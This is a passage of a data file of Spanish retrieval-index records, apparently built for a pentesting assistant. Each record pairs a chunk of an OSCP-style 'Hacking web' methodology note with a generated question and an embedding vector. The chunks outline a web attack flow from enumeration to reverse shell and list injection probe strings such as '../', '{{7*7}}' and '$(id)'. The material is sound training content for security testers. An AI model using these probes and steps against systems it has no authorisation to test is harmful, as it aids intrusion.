-0.00477, -0.13977, 0.00686, 0.02265, 0.01628, 0.13381, -0.0335, 0.03264, 0.04309, 0.04605, -0.00362, -0.04753, -0.15089, -0.08377, -0.07305, 0.04211, -0.00859, 0.11611, -0.16295, 0.00075, -0.0464, -0.07031, 0.02227, 0.05767, -0.04142, 0.06231, -0.0352, -0.00337, -0.04816, 0.07259, -0.05066, -0.04668, 0.02484, -0.036, -0.02692, 0.06396, -0.03707, -0.08612, 0.07874, -0.00931, -0.01209, -0.03482, 0.01113, -0.04486, -0.05884, -0.03701, -0.02416, 0.03867, -0.05212, -0.01888, 0.02749, 0.0318, 0.05431, 0.06859, 0.02389, -0.01904, -0.0674, 0.0879, 0.03039, 0.01651, -0.05283, 0.00317, 0.0511, -0.04492, -0.04752, -0.0482, -0.0179, -0.04252, -0.01027, 0.06168, 0.00122, -0.02569, -0.06875, 0.04784, 0.02893, -0.0301, 0.04627, -0.06575, -0.08377, -0.02124, 0.05261, 0.02662, -0.05652, -0.00206, 0.05965, 0.08186, 0.04379, 0.0198, 0.00517, 0.03395, -0.00555, -0.02447, 0.03444, 0.03366, 0.00203, -0.05753, -0.01222, -0.03697, 0.01311, -0.01613, 0.01667, -0.00763, -0.12443, -0.02717, -0.00602, 0.01982, -0.00144, -0.08425, -0.03123, -0.07168, -0.07793, 0.00448, -0.01673, -0.06576, -0.05719, 0.01445, 0.03055, 0.013, 0.02011, 0.03216]} -{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Hacking web (metodologΓ­a)\n\n> CΓ³mo atacar una web paso a paso. En el OSCP, la web es el **foothold** mΓ‘s comΓΊn de las mΓ‘quinas standalone. Sub-Γ­ndice de EnumeraciΓ³n dentro de la MetodologΓ­a OSCP.", "indexar": "que herramienta me sirve para enumerar vulnerabilidades en una mΓ‘quina standalone?", "v": [0.08807, 0.05279, -0.18338, -0.18377, -0.05102, -0.05665, -0.19767, -0.04426, 0.00804, -0.12401, -0.06967, -0.05097, -0.00226, -0.05524, 0.06342, 0.11186, 0.02137, -0.15737, 0.00799, 0.05606, -0.02049, -0.02699, -0.06556, -0.03442, -0.09968, 0.09795, 0.02542, -0.0514, -0.2339, 0.02143, 0.01586, 0.03098, 0.08154, -0.11528, -0.05221, -0.04722, -0.04221, 0.01609, 0.0341, 0.10517, 0.07381, 0.03522, -0.02246, 0.04991, 0.09527, -0.0004, -0.01144, -0.02355, 0.05925, 0.16674, -0.10378, -0.12774, -0.1186, 0.03672, 0.01108, -0.14008, 0.20382, -0.05789, 0.07124, -0.07882, -0.13653, 0.0137, -0.03061, -0.05369, -0.01668, 0.02753, -0.05336, -0.08277, -0.09955, 0.04988, -0.0431, -0.0026, 0.05789, -0.0945, -0.00127, -0.02584, 0.04039, 0.0423, 0.02651, 0.01826, 0.02572, -0.04263, -0.01768, 0.02022, -0.07638, -0.05967, 0.16566, 0.02307, 0.1167, -0.06209, 0.05295, 0.09334, -0.07272, -0.02577, 0.05923, -0.01554, 0.0809, -0.03599, 0.00814, -0.03495, 0.11846, -0.07655, -0.03245, 0.08439, -0.01343, 0.06847, -0.01274, -0.00391, -0.06948, -0.09547, 0.03443, 0.00184, -0.01996, 0.01677, -0.04283, 0.07176, -0.02855, -0.00044, 0.04137, -0.01818, 0.04243, -0.01203, -0.06597, -0.04505, -0.00934, -0.008, -0.02906, 0.08522, -0.02978, -0.11943, 0.06112, -0.02662, -0.04995, 0.05604, -0.01018, 0.01139, 0.05032, -0.14546, -0.03463, -0.06272, 0.05475, 0.10425, -0.06304, -0.04244, 0.00652, 0.01422, 0.05632, -0.06637, -0.01402, 0.00247, 0.06789, -0.07551, -0.00558, 0.05223, -0.08263, 0.00933, -0.06669, 0.03782, -0.08337, 0.05095, -0.02828, -0.00838, -0.00269, 0.03302, -0.01041, 0.01263, 0.0793, 0.04575, 0.07919, 0.03279, 0.0292, 0.02595, 0.10766, 0.03394, -0.01028, -0.05563, -0.03542, 0.02766, -0.02113, -0.05321, -0.00915, -0.03073, -0.00769, -0.04066, -0.00046, -0.01262, 0.00928, -0.02182, 0.02921, 0.01072, -0.0231, -0.0105, -0.00616, -0.06006, 0.06318, 0.00722, -0.04033, 0.02374, 0.04062, -0.04222, -0.07381, -0.0137, -0.06354, 0.00586, 0.04055, 0.11552, -0.01876, -0.06627, -0.00727, 0.02237, 0.01637, 0.05851, 0.02589, -0.02431, -0.01919, -0.06678, 0.00384, 0.05155, -0.05138, -0.05253, 0.02335, -0.0999, -0.01116, 0.0551, 0.00362, 0.03485, -0.00098, -0.01406, 0.03258, -0.00948, 0.03199, -0.05515, -0.01673, -0.02316, 0.01448, -0.082, 0.01876, -0.01342, -0.03833, -0.02251, -0.00056, 0.00237, 0.03099, -0.06416, -0.03678, -0.05163, 0.02428, -0.04476, -0.05922, -0.06851, -0.06763, -0.00472, 0.02997, -0.02613, 0.00053, -0.01849]} -{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Hacking web (metodologΓ­a)\n\n> CΓ³mo atacar una web paso a paso. En el OSCP, la web es el **foothold** mΓ‘s comΓΊn de las mΓ‘quinas standalone. Sub-Γ­ndice de EnumeraciΓ³n dentro de la MetodologΓ­a OSCP.", "indexar": "cual es el metodo para montar un foothold web en la metodologia OSCP?", "v": [-0.06765, -0.03606, -0.11147, -0.14057, -0.22582, -0.1274, 0.01881, 0.04413, -0.16996, -0.08422, -0.06016, 0.03757, 0.15927, -0.01425, 0.04243, -0.00833, 0.18812, -0.1175, 0.00209, -0.10316, -0.15975, -0.12707, -0.12534, -0.07323, 0.04375, 0.09473, 0.01498, -0.02834, -0.07575, -0.01846, 0.02013, 0.09508, -0.02183, 0.06916, -0.11485, -0.01269, -0.06723, -0.11784, -0.07897, 0.06362, -0.20567, -0.05455, -0.00254, 0.04289, 0.05186, -0.05917, 0.06515, -0.02476, -0.0443, 0.04462, 0.09128, -0.02141, -0.08026, -0.01767, -0.1215, -0.05068, 0.08635, 0.00279, -0.00094, -0.03875, 0.02277, 0.07566, -0.05358, -0.01086, 0.06574, -0.09722, -0.01851, 0.05588, -0.12278, 0.0248, 0.08872, -0.03412, -0.08136, 0.04108, 0.04101, 0.03192, 0.01628, 0.01934, 0.1576, -0.06001, -0.02739, -0.05706, -0.06105, 0.10881, -0.138, -0.0216, 0.10287, -0.10844, -0.00619, -0.07543, -0.01467, 0.05912, -0.03762, -0.05926, -0.03677, -0.15196, 0.12428, 0.10611, -0.00198, 0.00687, -0.05774, 0.04471, -0.07517, 0.07658, 0.00287, -0.02082, 0.01627, 0.01658, 0.01, -0.06213, -0.00821, 0.06926, -0.06486, 0.07851, -0.09102, -0.06125, 0.0359, 0.05886, -0.0938, -0.04956, -0.10662, 0.07809, -0.06569, -0.019, 0.01898, -0.01621, 0.05705, 0.07244, -0.01496, 0.01791, -0.02143, -0.05041, -0.03948, 0.02174, -0.00215, -0.00178, -0.02778, -0.01684, -0.04413, 0.00249, 0.0115, -0.01633, -0.0412, -0.06027, 0.04817, -0.0575, 0.04087, -0.05719, -0.03648, -0.07334, -0.01325, 0.07688, 0.01932, -0.03156, -0.06181, -0.07818, 0.03862, 0.02301, -0.064, 0.15587, -6e-05, -0.02122, 0.06202, -0.01375, 0.018, -0.01619, -0.02591, 0.01988, -0.0217, -0.0392, -0.01107, 0.0682, 0.04727, -0.0155, 0.07523, 0.03621, -0.03388, -0.056, 0.01261, 0.03442, 0.01278, 0.04955, 0.05141, 0.02493, 0.03591, 0.01236, -0.01261, 0.06474, -0.02409, 0.04234, 0.03511, -0.00467, -0.04574, 0.00476, -0.0038, -0.007, 0.03795, -0.01644, 0.05142, 0.01777, -0.07337, -0.0459, 0.04897, -0.03466, 0.00569, -0.01797, -0.00412, -0.0206, -0.01768, 0.01385, 0.00673, -0.07489, 0.03882, -0.06505, 0.02627, -0.01542, -0.04812, -0.03527, -0.07657, 0.04821, 0.04797, 0.00569, 0.00625, 0.00777, -0.03951, 0.01633, 0.00271, 0.03135, -0.03881, -0.04124, -0.04377, -0.0539, 0.02265, -0.00606, 0.01018, 0.02596, 0.03754, -0.03725, -0.05147, -0.03198, 0.02409, -0.00286, 0.00673, 0.00347, 0.01526, -0.06305, -0.03413, -0.01383, 0.05407, -0.04403, 0.02265, -0.07542, -0.03862, -0.02837, -0.01886, -0.03281]} -{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## El flujo\n```\n1. ENUMERAR β†’ EnumeraciΓ³n web + Content discovery + Vhosts y subdominios\n2. MAPEAR superficie β†’ cada input es un test: URL, params GET/POST, headers,\n cookies, formularios, uploads, JSON/API. Mapea con Burp Suite.\n3. IDENTIFICAR tecnologΓ­a β†’ whatweb, wappalyzer, headers, errores β†’ searchsploit del CMS\n4. PROBAR cada vector (uno a uno):\n SQL injection (login, params, search)\n Command injection (params que ejecutan algo: ping, convert, export)\n Directory traversal (file=, path=, download=, page=)\n LFI a RCE / RFI (include de ficheros)\n File upload bypass (avatar, documento, import)\n XSS (reflejo en la pΓ‘gina)\n SSTI ({{7*7}} en plantillas)\n Authentication attacks (default creds, fuerza bruta, bypass)\n5. EXPLOTAR β†’ de RCE a Reverse shell β†’ luego Privesc Linux / Privesc Windows\n```", "indexar": "quΓ© herramientas sirven para mapear las URL y formularios de un sitio web?", "v": [0.11416, -0.00041, -0.04923, -0.14789, 0.0075, -0.1449, 0.02442, -0.12048, 0.02595, -0.05523, -0.08365, -0.11305, 0.06983, -0.10315, 0.07135, 0.04969, 0.09882, -0.0737, 0.08534, -0.06227, -0.01574, 0.06699, -0.13669, -0.00277, -0.22739, -0.07774, 0.13353, -0.15839, -0.17535, 0.0631, 0.09479, 0.09736, -0.01984, 0.01237, -0.08755, -0.02779, 0.01825, 0.03663, -0.10253, -0.05202, -0.01274, -0.02188, -0.12581, 0.05283, -0.09756, 0.04441, -0.08746, -0.06213, 0.05563, 0.02026, 0.00189, -0.14821, -0.15702, 0.01535, -0.06866, -0.01867, 0.20293, -0.1875, 0.09653, -0.02017, -0.13686, -0.01741, -0.03938, 0.06466, -0.00751, -0.00995, 0.0413, 0.01603, -0.08787, 0.03051, 0.0486, -0.04266, 0.07516, -0.06391, 0.00094, -0.07547, -0.02098, -0.01432, -0.00359, 0.06473, 0.04628, 0.0441, -0.14752, 0.03795, -0.04365, 0.02034, 3e-05, 0.01503, -0.03428, -0.16079, 0.04337, 0.08287, -0.05446, -0.00274, -0.0713, -0.11343, -0.0378, 0.01067, 0.04521, -0.01062, -0.03423, -0.01254, -0.03485, 0.02216, 0.00637, 0.00836, -0.0072, 0.06006, -0.03473, 0.03328, 0.07035, 0.0455, -0.08977, -0.0003, 0.02379, 0.05776, 0.00926, -0.00233, -0.01588, -0.16546, 0.01578, 0.06856, -0.09167, 0.00952, -0.02053, 0.08487, -0.01401, 0.03975, 0.03687, -0.05368, 0.02343, -0.08354, -0.06137, 0.05151, 0.10536, 0.01615, 0.05855, -0.02406, 0.0004, -0.00271, -0.012, -0.00273, -0.09038, -0.04712, 0.02086, -0.05802, 0.01926, 0.02474, -0.11129, -0.04975, -0.0316, 0.04139, 0.00086, 0.02135, -0.05199, -0.02247, -0.04636, -0.02128, -0.07033, -0.01397, -0.04376, 0.03396, 0.04003, 0.03285, 0.00733, 0.03901, -0.0295, 0.08487, 0.03091, 0.01719, 0.02689, 0.09416, 0.03732, -0.13026, 0.0254, 0.0449, -0.06823, 0.06255, 0.05956, -0.01786, 0.00121, -0.04822, -0.01154, 0.04232, -0.05165, 0.00296, 0.05377, -0.07656, -0.01002, 0.00617, -0.06141, 0.02211, -0.02797, -0.01639, 0.06069, 0.04334, -0.0039, 0.00583, 0.01286, -0.0325, -0.00732, -0.03838, -0.01694, -0.01713, -0.02909, 0.08723, 0.01267, -0.08971, -0.01276, 0.00235, -0.00077, -0.05436, 0.04659, -0.07212, -0.02923, -0.03025, 0.05067, 0.00589, -0.00733, -0.00959, 0.04747, 0.01791, -0.02092, -0.00689, 0.03351, 0.06454, 0.06657, -0.02462, -0.01188, -0.0001, -0.001, -0.04094, -0.0429, -0.02244, 0.0009, -0.02899, 0.00881, -0.0475, -0.04466, -0.01451, 0.00025, 0.02178, -0.03162, -0.01016, -0.02936, -0.06828, -0.03311, -0.03714, -0.00897, -0.01116, -0.06455, -0.03218, 0.03182, 0.01581, -0.0142, -0.03292]} -{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## El flujo\n```\n1. ENUMERAR β†’ EnumeraciΓ³n web + Content discovery + Vhosts y subdominios\n2. MAPEAR superficie β†’ cada input es un test: URL, params GET/POST, headers,\n cookies, formularios, uploads, JSON/API. Mapea con Burp Suite.\n3. IDENTIFICAR tecnologΓ­a β†’ whatweb, wappalyzer, headers, errores β†’ searchsploit del CMS\n4. PROBAR cada vector (uno a uno):\n SQL injection (login, params, search)\n Command injection (params que ejecutan algo: ping, convert, export)\n Directory traversal (file=, path=, download=, page=)\n LFI a RCE / RFI (include de ficheros)\n File upload bypass (avatar, documento, import)\n XSS (reflejo en la pΓ‘gina)\n SSTI ({{7*7}} en plantillas)\n Authentication attacks (default creds, fuerza bruta, bypass)\n5. EXPLOTAR β†’ de RCE a Reverse shell β†’ luego Privesc Linux / Privesc Windows\n```", "indexar": "con quΓ© programa puedo identificar el CMS o tecnologΓ­a de una pΓ‘gina viendo sus headers?", "v": [0.01425, 0.10302, 0.03489, -0.1654, 0.03265, -0.21933, -0.0845, -0.01795, -0.05329, -0.05353, -0.12543, -0.05289, -0.04605, -0.06836, 0.11414, 0.07583, 0.22838, -0.12801, 0.12085, -0.06724, -0.00015, -0.13708, -0.11617, -0.04656, -0.08627, -0.02828, -0.02386, -0.04995, -0.10569, -0.06048, 0.05928, -0.10133, -0.03393, 0.02804, -0.1196, -0.02288, -0.06516, 0.0676, -0.01123, 0.10203, -0.00779, 0.00076, 0.01857, 0.0545, 0.16093, -0.10761, 0.05911, -0.09356, 0.07871, -0.05551, -0.06551, 0.04197, -0.1687, 0.04551, 0.01217, 0.00877, 0.05551, -0.03492, 0.00865, -0.0545, -0.04069, 0.06084, -0.05173, -0.05585, -0.11257, -0.03563, -0.06135, -0.047, 0.00947, 0.08033, 0.06467, -0.07489, 0.05882, -0.10941, 0.06035, 0.03103, -0.01585, 0.00615, 0.11115, -0.05144, -0.06121, -0.0439, -0.01698, 0.08351, -0.05476, -0.05028, -0.00232, -0.01521, -0.08582, -0.10175, 0.09945, 0.15228, 0.0247, -0.0012, -0.00201, 0.03265, 0.09587, -0.02479, 0.0364, 0.04089, -0.0551, 0.00803, -0.07025, 0.11811, -0.00052, 0.05191, 0.08986, -0.05965, -0.03761, -0.0125, -0.00782, 0.00941, -0.10761, 0.00141, -0.146, 0.05841, 0.01715, 0.06891, 0.04724, -0.09539, -0.09733, 0.00409, 0.01239, -0.05868, 0.1362, 0.02714, -0.04931, 0.07984, -0.06733, 0.05214, 0.0005, -0.06263, -0.05276, 0.03256, -0.01258, 0.02755, 0.03965, -0.01155, 0.0194, -0.06684, -0.05491, 0.01566, 0.01957, -0.00929, 0.02515, -0.09897, -0.01713, -0.04661, -0.09229, -0.00508, 0.00773, 0.03817, -0.02347, -0.00784, -0.14692, -0.01611, 0.05333, 0.031, -0.06719, -0.01978, -0.06796, -0.00081, 0.00951, -0.02224, 0.04603, -0.03526, -0.04232, 0.00435, 0.0582, 0.11902, -0.0136, 0.05955, 0.05967, -0.08398, -0.01332, -0.00812, -0.04483, -0.02704, 0.03079, -0.04993, -0.08828, 0.05033, 0.04187, -0.00832, -0.00855, -0.09422, -0.02732, 0.04517, -0.00585, -0.02842, 0.02629, 0.01904, -0.02073, -0.00922, 0.05798, 0.00542, -0.01872, -0.03804, 0.00834, -0.00998, -0.07233, 0.00755, 0.04093, -0.0405, -0.02233, 0.02929, 0.05705, -0.03288, 0.00248, 0.04419, -0.03657, -0.02359, 0.03233, 0.01988, -0.01868, -0.03411, -0.04909, 0.0211, 0.02391, -0.00597, 0.04306, 0.02865, 0.0183, 0.06468, 0.05472, -0.02098, 0.03053, 0.0134, -0.01664, -0.01795, -0.0238, -0.07791, 0.01946, -0.00962, 0.0784, -0.0344, -0.00781, -0.01413, -0.04492, -0.01307, 0.01898, 0.04305, 0.01548, -0.01502, 0.02431, 0.03425, -0.13063, -0.02538, -0.03223, 0.00847, -0.04114, -0.05313, 0.01883, -0.05285, 0.03227, 0.06655]} -{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## El flujo\n```\n1. ENUMERAR β†’ EnumeraciΓ³n web + Content discovery + Vhosts y subdominios\n2. MAPEAR superficie β†’ cada input es un test: URL, params GET/POST, headers,\n cookies, formularios, uploads, JSON/API. Mapea con Burp Suite.\n3. IDENTIFICAR tecnologΓ­a β†’ whatweb, wappalyzer, headers, errores β†’ searchsploit del CMS\n4. PROBAR cada vector (uno a uno):\n SQL injection (login, params, search)\n Command injection (params que ejecutan algo: ping, convert, export)\n Directory traversal (file=, path=, download=, page=)\n LFI a RCE / RFI (include de ficheros)\n File upload bypass (avatar, documento, import)\n XSS (reflejo en la pΓ‘gina)\n SSTI ({{7*7}} en plantillas)\n Authentication attacks (default creds, fuerza bruta, bypass)\n5. EXPLOTAR β†’ de RCE a Reverse shell β†’ luego Privesc Linux / Privesc Windows\n```", "indexar": "cuΓ‘l es la mejor alternativa libre para hacer enumeraciΓ³n de subdominios y vhosts?", "v": [-0.14756, -0.01353, -0.08771, 0.05233, -0.00096, -0.00425, -0.03621, -0.08613, -0.12125, -0.12653, -0.14534, -0.17097, -0.04109, -0.00906, 0.11361, -0.10947, 0.12964, -0.03971, -0.00578, 0.07603, -0.07663, -0.0289, -0.14444, -0.00263, 0.02221, -0.1583, -0.03272, 0.07086, -0.09234, 0.01317, 0.06689, -0.13284, -0.02773, -0.02416, -0.01006, -0.05847, 0.11754, 0.02811, 0.08928, 0.0475, 0.03994, 0.02451, 0.01875, 0.06923, -0.09433, -0.06784, -0.13826, 0.03021, 0.02273, -0.10321, -0.10214, -0.03628, 0.05684, -0.05441, 0.07211, -0.06576, 0.03163, -0.2183, 0.02682, -0.08094, -0.00325, -0.00707, 0.05652, 0.03284, 0.1149, 0.01675, -0.0788, -0.00706, -0.0609, 0.0926, 0.02564, -0.09209, 0.09064, 0.02545, -0.04915, 0.0321, -0.0596, -0.0126, -0.04878, 0.05105, 0.03829, -0.04726, 0.00836, 0.08285, -0.02514, -0.04333, 0.01946, -0.10363, -0.00062, 0.02646, 0.14804, -0.00974, 0.0524, 0.04795, 0.04556, -0.10847, 0.00697, 0.10979, -0.01848, 0.00307, 0.12121, 0.04085, -0.09836, 0.11766, 0.05272, 0.01436, -0.06296, 0.02283, -0.14624, -0.02312, 0.04571, -0.00048, -0.06464, 0.05421, -0.10747, -0.11329, -0.13821, 0.04414, 0.04271, 0.04579, 0.03196, -0.04702, -0.07733, -0.05737, 0.00391, 0.07933, 0.08304, 0.01031, -0.00115, 0.0077, 0.01932, -0.03226, -0.02693, -0.07143, -0.10326, -0.03098, 0.10827, -0.02856, 0.04631, 0.02223, -0.04927, 0.02805, -0.00469, 0.06732, 0.01841, -0.03528, 0.03493, -0.05297, -0.00433, 0.00218, -0.00277, 0.01158, 0.01199, 0.01328, -0.00759, -0.00121, -0.00842, -0.03955, -0.03107, 0.14053, 0.06509, -0.08646, -0.04355, -0.04392, -0.01823, -0.02305, 0.00375, 0.03793, -0.12337, 0.00108, 0.02791, 0.13607, -0.01744, -0.09944, 0.05541, -0.01047, 0.04026, -0.05007, -0.01746, 0.00219, 0.09141, -0.01395, -0.08707, 0.03537, 0.0191, -0.01837, 0.05179, 0.05162, -0.00745, -0.0026, -0.04388, -0.04364, -0.04394, -0.03302, 0.00775, -0.00935, 0.03056, -0.03677, -0.07, 0.02469, -0.08291, -0.03857, 0.00166, -0.01339, -0.01701, -0.01684, -0.08192, 0.01233, 0.06237, -0.00329, 0.00737, -0.00854, 0.03044, -0.01901, -0.032, 0.0868, -0.0246, 0.02569, -0.0691, -0.06266, -0.00884, 0.00028, -0.03146, 0.00375, 0.002, 0.04683, 0.04803, 0.06804, -0.03549, 0.05061, 0.04101, -0.00942, 0.05925, 0.06332, -0.03016, -0.03831, 0.00668, 0.01196, 0.06073, 0.06082, 0.01419, -0.01257, 0.02179, 0.02315, -0.06471, 0.03611, -0.04129, -0.00827, -0.06942, 0.0091, -0.0012, -0.02602, 0.00214, 0.03037, 0.01013, 0.07828]} -{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## La regla de oro web\n**Todo input es sospechoso.** Por cada parΓ‘metro, prueba: comilla `'`, `<`, `;`, `../`, `{{7*7}}`, `$(id)`. La pΓ‘gina te dice por su reacciΓ³n quΓ© vector hay.", "indexar": "que herramienta me ayuda a probar si los parΓ‘metros son sospechosos?", "v": [0.15202, 0.20666, -0.15827, -0.20067, -0.0604, -0.04712, 0.00223, -0.079, -0.01223, -0.07745, -0.06205, 0.07964, 0.13238, -0.10987, -0.04076, 0.00675, 0.066, -0.01603, -0.03796, 0.03974, 0.08419, -0.07773, -0.17266, -0.09191, -0.10302, -0.04525, 0.06334, 0.01588, -0.17133, 0.01432, -0.06475, 0.0027, 0.03562, -0.02958, -0.17881, -0.01514, -0.05638, -0.01831, 0.08792, 0.08149, 0.01184, -0.11051, 0.0286, -0.03322, 0.02082, 0.08068, -0.16644, 0.00953, -0.06767, 0.04534, -0.037, -0.16475, -0.0764, -0.01166, -0.05066, -0.15864, 0.1804, -0.11906, 0.0185, -0.13287, -0.05624, -0.08989, -0.03082, 0.01258, 0.01906, -0.04346, 0.03858, -0.06005, -0.06614, 0.02686, -0.03535, 0.05881, -0.05915, -0.0051, -0.02428, 0.0178, 0.08025, 0.00235, 0.15736, -0.08264, 0.01549, 0.04455, -0.00178, 0.03921, -0.04866, -0.08415, 0.0444, -0.04456, -0.01307, -0.07322, 0.00089, -0.02447, 0.01734, 0.04323, 0.02517, 0.05458, 0.11377, -0.03061, 0.06986, -0.01555, 0.13669, -0.14425, -0.08511, 0.09026, -0.02083, -0.02792, -0.06075, 0.00639, -0.09998, -0.01211, 0.00853, 0.00899, -0.01227, -0.02175, -0.05682, -0.01293, -0.0116, -0.06743, -0.0799, -0.09434, 0.06001, 0.07448, -0.06993, -0.02039, 4e-05, -0.05451, -0.06315, 0.01162, 0.09436, 0.02701, 0.00785, -0.00196, -0.03755, 0.03411, -0.0139, 0.01403, -0.00595, -0.0952, -0.03958, -0.04223, 0.01089, 0.02354, 0.05693, -0.11979, 0.07044, -0.04399, 0.00445, 0.00272, -0.02755, 0.02252, 0.01669, -0.02989, 0.00329, 0.06906, -0.10094, 0.03059, 0.00402, 0.01303, -0.05214, -0.01854, -0.04752, -0.00936, 0.0501, -0.0051, 0.01297, -0.03331, 0.08097, -0.05127, 0.03498, 0.03584, -0.01102, 0.00487, 0.00964, 0.01942, 0.00542, -0.05451, -0.04838, -0.02305, -0.02041, -0.06849, -0.05272, 0.02852, -0.01571, -0.0392, 0.02352, -0.07762, 0.04684, -0.05499, -0.00635, 0.0081, 0.00326, 0.07114, -0.00441, -0.06287, -0.0096, 0.02198, -0.01067, -0.0361, 0.05902, -0.02327, -0.02965, -0.03094, -0.03367, -0.04798, -0.01082, 0.07496, -0.0517, -0.01355, 0.01001, 0.00017, 0.02481, -0.01052, 0.06289, -0.01918, 0.00803, -0.02335, 0.00285, -0.00169, -0.03387, -0.01357, 0.00825, 0.02734, 0.10402, 0.04502, -0.00166, 0.04003, 0.04448, 0.0504, 0.0087, -0.056, 0.04415, -0.03637, -0.01763, -0.03756, 0.02624, -0.0334, 0.06318, -0.02665, -0.05902, -0.04789, 0.00874, 0.04206, -0.03309, -0.05258, 0.01859, -0.0149, -0.03355, -0.0231, -0.03529, -0.07482, 0.01587, 0.04282, 0.08052, -0.07823, 0.04412, -0.05054]} -{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## La regla de oro web\n**Todo input es sospechoso.** Por cada parΓ‘metro, prueba: comilla `'`, `<`, `;`, `../`, `{{7*7}}`, `$(id)`. La pΓ‘gina te dice por su reacciΓ³n quΓ© vector hay.", "indexar": "con que puedo hacer una prueba de seguridad para ver las reacciones de la pΓ‘gina ante diferentes vectores?", "v": [0.14335, 0.10116, -0.15802, -0.11729, -0.03516, 0.09516, -0.00181, -0.04199, 0.15249, -0.13409, -0.01851, -0.09637, -0.07122, -0.04278, 0.13834, 0.14802, 0.02487, -0.00176, 0.0731, -0.02534, 0.11843, -0.21393, -0.01875, -0.07372, 0.04826, 0.15965, 0.02143, 0.10177, 0.0745, -0.06601, -0.06824, -0.02892, 0.08002, -0.00294, -0.16435, 0.10297, 0.02774, -0.01079, 0.11508, 0.14754, -0.04318, -0.07182, -0.04549, -0.06762, 0.06045, 0.03039, -0.02521, -0.06585, -0.04033, -0.06074, -0.06002, 0.02187, -0.07996, -0.01161, -0.11831, -0.07307, 0.07803, 0.00643, 0.07452, -0.03371, -0.03482, 0.07079, 0.05224, -0.0338, -0.01296, -0.05308, -0.00475, -0.004, -0.01882, -0.05223, -0.07152, -0.00921, -0.00371, -0.03615, -0.03264, 0.00132, -0.0275, 0.04868, -0.0681, 0.10563, -0.11636, 0.09231, -0.0665, 0.01643, -0.01952, -0.06509, -0.07654, -0.09475, 0.01633, -0.06008, 0.02645, 0.0391, 0.06214, -0.07555, -0.05996, -0.0831, 0.05855, -0.00693, 0.02023, 0.00705, 0.0375, -0.07878, -0.03265, -0.00982, 0.00826, -0.05344, -0.03079, 0.02588, 0.04682, -0.08516, 0.0619, -0.0255, -0.12005, -0.06547, -0.09167, 0.01124, -0.04848, -0.02739, 0.03225, 0.00462, -0.07597, -0.06171, -0.01373, -0.00297, 0.0816, 0.07466, 0.00284, 0.01815, -0.02465, 0.05288, -0.01964, -7e-05, -0.13946, -0.0577, 0.01441, 0.03601, -0.03913, -0.10434, 0.02423, -0.11147, 0.02517, 0.03746, 0.03747, -0.088, -0.0157, 0.03018, -0.04602, -0.01055, -0.13444, 0.06748, 0.00445, 0.0353, 0.05214, 0.03607, -0.06535, 0.03271, 0.02041, -0.02729, 0.07246, 0.03019, -0.03466, 0.06252, -0.00339, 0.03672, 0.0424, -0.02792, -0.10476, -0.06078, 0.03837, 0.028, -0.01222, 0.02723, 0.00678, -0.08492, 0.06477, 0.01123, -0.11374, -0.07539, 0.0677, -0.05398, 0.03335, -0.01529, -0.06726, -0.00459, 0.0526, -0.08614, 0.08144, 0.01248, 0.06933, 0.03442, 0.02158, 0.10275, -0.06507, 0.05727, -0.01992, -0.02851, 0.05803, 0.00064, 0.0156, -0.01884, -0.00589, -0.04295, -0.00033, -0.04484, 0.01179, 0.07032, -0.03519, 0.01677, -0.00493, -0.02003, 0.02891, 0.00457, 0.14205, -0.03161, -0.04662, -0.01736, 0.05061, 0.02881, -0.06081, -0.00865, 0.05991, 0.08896, -0.02812, 0.04081, -0.02841, 0.01935, 0.00826, -0.03008, 0.04834, 0.08022, -0.00207, -0.02549, 0.00012, -0.03276, 0.06424, -0.00179, 0.03192, 0.01095, -0.00344, -0.09278, 0.02182, 0.05657, -0.06331, -0.06711, -0.05253, -0.04208, -0.08321, 0.00846, 0.02002, -0.0266, -0.02623, -0.02224, 0.06834, -0.01996, 0.00556, -0.04681]} -{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## La regla de oro web\n**Todo input es sospechoso.** Por cada parΓ‘metro, prueba: comilla `'`, `<`, `;`, `../`, `{{7*7}}`, `$(id)`. La pΓ‘gina te dice por su reacciΓ³n quΓ© vector hay.", "indexar": "cual es el mejor software para realizar inyecciones y detectar quΓ© vector funciona?", "v": [-0.14284, 0.11711, -0.13553, -0.0805, 0.1458, -0.16206, -0.03129, -0.05375, -0.0175, -0.19549, -0.14008, -0.16311, -0.10073, -0.08332, 0.07569, 0.01072, 0.04744, -0.21828, 0.032, -0.05657, 0.04167, -0.07309, -0.01464, -0.16836, -0.0973, 0.11873, -0.04746, 0.02425, -0.09898, -0.04911, 0.04771, -0.11027, 0.16741, -0.05145, -0.13959, 0.00201, 0.0458, -0.00988, 0.06731, 0.08979, 0.04522, 0.0683, -0.06288, -0.00251, 0.04816, 0.01909, 0.03248, -0.06573, 0.01155, -0.02867, -0.07137, 0.05859, -0.03165, -0.05987, -0.00827, -0.07312, -0.00073, -0.02427, 0.13421, -0.12182, -0.07008, 0.03429, -0.0594, -0.07361, -0.00618, -0.08613, 0.06083, -0.1456, -0.04729, -0.04365, -0.04395, 0.03424, 0.03686, 0.12172, 0.0006, 0.05836, 0.00259, 0.02388, 0.01285, -0.01885, 0.06411, 0.02652, -0.04919, 0.09908, 0.0233, -0.04617, 0.06514, -0.06217, 0.05582, -0.1318, 0.00466, 